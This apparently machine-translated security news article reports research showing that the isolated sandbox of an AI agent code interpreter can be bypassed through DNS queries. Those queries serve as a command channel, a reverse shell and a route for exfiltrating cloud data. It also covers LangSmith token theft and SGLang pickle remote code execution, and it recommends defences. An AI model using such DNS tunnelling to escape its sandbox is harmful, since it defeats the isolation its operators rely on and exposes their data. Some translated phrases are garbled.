In recent weeks, security around the platforms that run code for artificial intelligence agents has turned the alarms on again. Cybersecurity researchers have described a technique that can extract sensitive information by taking advantage of Domain Name System (DNS) consultations from environments that, on paper, should be isolated. The report published by BeyondTrust details how the sandbox mode of the Amazon Bedrock AgentCore Code Interpreter allows you to solve DNS to the outside, which can open control and control channels and exfiltration routes even when the configuration indicates "without network access."
The vector is surprisingly simple in its idea: if a sandbox environment can issue DNS consultations to domains controlled by an attacker, these requests can become two-way messages. In practice, researchers managed to mount an interactive communication that allows sending commands and receiving responses using DNS records, obtain an interactive reverse shell and filter data stored in AWS services - for example, in S3 buckets - provided that the IAM role associated with the code interpreter has excessive permissions. Beyond the extraction, the mechanism can serve to deliver loads that the Code Interpreter itself downloads and runs by consulting instructions stored in A records of a malicious DNS server.
The finding is pointed out as a serious problem: although at the time of writing it has no CVE identifier, BeyondTrust assigned a severity that arouses attention. Amazon, for its part, after the responsible disclosure in September 2025, has defined this behavior as intended functionality and recommends migrating critical loads to VPC mode to achieve true network isolation. Your blog and documentation explains the nature of the service and the deployment options; for example, you can see the official introduction to the Code Interpreter in the AWS blog Amazon Bedrock AgentCore Code Interpreter and the technical guide in official documentation from AWS. For those seeking complete isolation, AWS aims to operate within a VPC and to use a DNS firewall to block unwanted resolutions; a useful reference to that protection is the article on Route 53 Resolver DNS Firewall.
This incident illustrates a recurring pattern: the combination of execution of dynamic code (specific to the IA agents) and poorly calibrated permissions can multiply the damage. If a service that runs code has assigned a too permissive role, the value of each malicious DNS query increases, because the attacker could, for example, ask the interpreter to read resources to which that role has access and return that information through subdomains. The immediate practical recommendation that many experts repeat is to review and limit the IAM roles associated with these services, implementing the principle of less privilege and migrating sensitive instances to environments with more stringent network rules.
This wave of warnings is not alone. In parallel to Bedrock research, other platforms and libraries of the IA ecosystem have shown serious vulnerabilities. The LangSmith observability platform suffered a failure that allowed an attacker to steal tokens and be made with user accounts by handling a URL parameter; that problem received the designation CVE-2026-25750 and was corrected in version 0.12.71, as described by the discoverers in their analysis Miggo Security. The risk was that with a committed token an attacker can review the track history of the IA and recover calls to tools containing internal queries, CRM records or private code fragments.
Another set of worrying vulnerabilities affects SGLang, an open-source framework to serve language and multimodal models. Orca researchers described unsafe deserialization failures with pickle that, in specific scenarios, allow remote code execution without authentication. The problems get public identity in the CVE records as CVE-2026-3059, CVE-2026-3060 and CVE-2026-3989, and Orca published a technical analysis that deserves to be read calmly Here.. CERT / CC also issued a coordinated warning indicating that when certain modules are active and exposed to the network, an attacker can send malicious pickle files to the ZeroMQ broker and cause the deserialization of unreliable data according to the notice.
The lessons are clear and applicable to organizations of any size: the execution environments of agents and models are already part of the backbone of many operations, and should therefore be treated as critical infrastructure. Migrating sensitive loads to virtual private networks and strengthening DNS controls reduces the risk surface, but does not replace the need to audit permissions, review default settings and update quickly when a patch is published. Also, exposing ZeroMQ interfaces or similar to unreliable networks is an invitation to risk; these doors must be closed by segmentation and rules that limit access to specific hosts and ports.
From an operational perspective, it is appropriate to implement dedicated monitoring: alerts for processes that open unusual outgoing connections, for creating files on foreign routes or for DNS traffic to unusual domains. In the case of LangSmith the immediate action was to update to a corrected version; in the case of SGLang, in addition to patches, the mitigation is to restrict the scope of the brokers and to apply network controls. Amazon, for its part, has expressly recommended that customers with critical loads leave the sandbox mode and move to VPC to achieve isolation, and use DNS filtering solutions as mentioned by AWS.
Finally, this episode recalls that innovation in IA brings new security challenges: dynamic execution, integration with cloud services and flexibility for developers coexist with vectors that attackers can chain. The answer is not to give up these tools, but to manage them with robust security policies, regular permit reviews and a cycle of parking and audit as agile as the development that feeds these platforms. To be informed through the analysis of industry signatures and official notices - such as those linked to this article - is an essential part of this defence.
18-year-old Ukrainian youth leads a network of infostealers that violated 28,000 accounts and left $250,000 in losses
The Ukrainian authorities, in coordination with US agents. They have focused on an operation of infostealer which, according to the Ukrainian Cyber Police, was allegedly adminis...
RAMPART and Clarity redefine the safety of IA agents with reproducible testing and governance from the start
Microsoft has presented two open source tools, RAMPART and Clarity, aimed at changing the way the safety of IA agents is tested: one that automates and standardizes technical te...
The digital signature is in check: Microsoft dismands a service that turned malware into apparently legitimate software
Microsoft announced the disarticulation of a "malware-signing-as-a-service" operation that exploited its device signature system to convert malicious code into seemingly legitim...
A single GitHub workflow token opened the door to the software supply chain
A single GitHub workflow token failed in the rotation and opened the door. This is the central conclusion of the incident in Grafana Labs following the recent wave of malicious ...
WebWorm 2025: the malware that is hidden in Discord and Microsoft Graphh to evade detection
The latest observations by cyber security researchers point to a change in worrying tactics of an actor linked to China known as WebWorm: in 2025 it has incorporated back doors ...
Identity is no longer enough: continuous verification of the device for real-time security
Identity remains the backbone of many security architectures, but today that column is cracking under new pressures: advanced phishing, real-time proxyan authentication kits and...
The dark matter of identity is changing the rules of corporate security
The Identity Gap: Snapshot 2026 report published by Orchid Security puts numbers to a dangerous trend: the "dark matter" of identity - accounts and credentials that are neither ...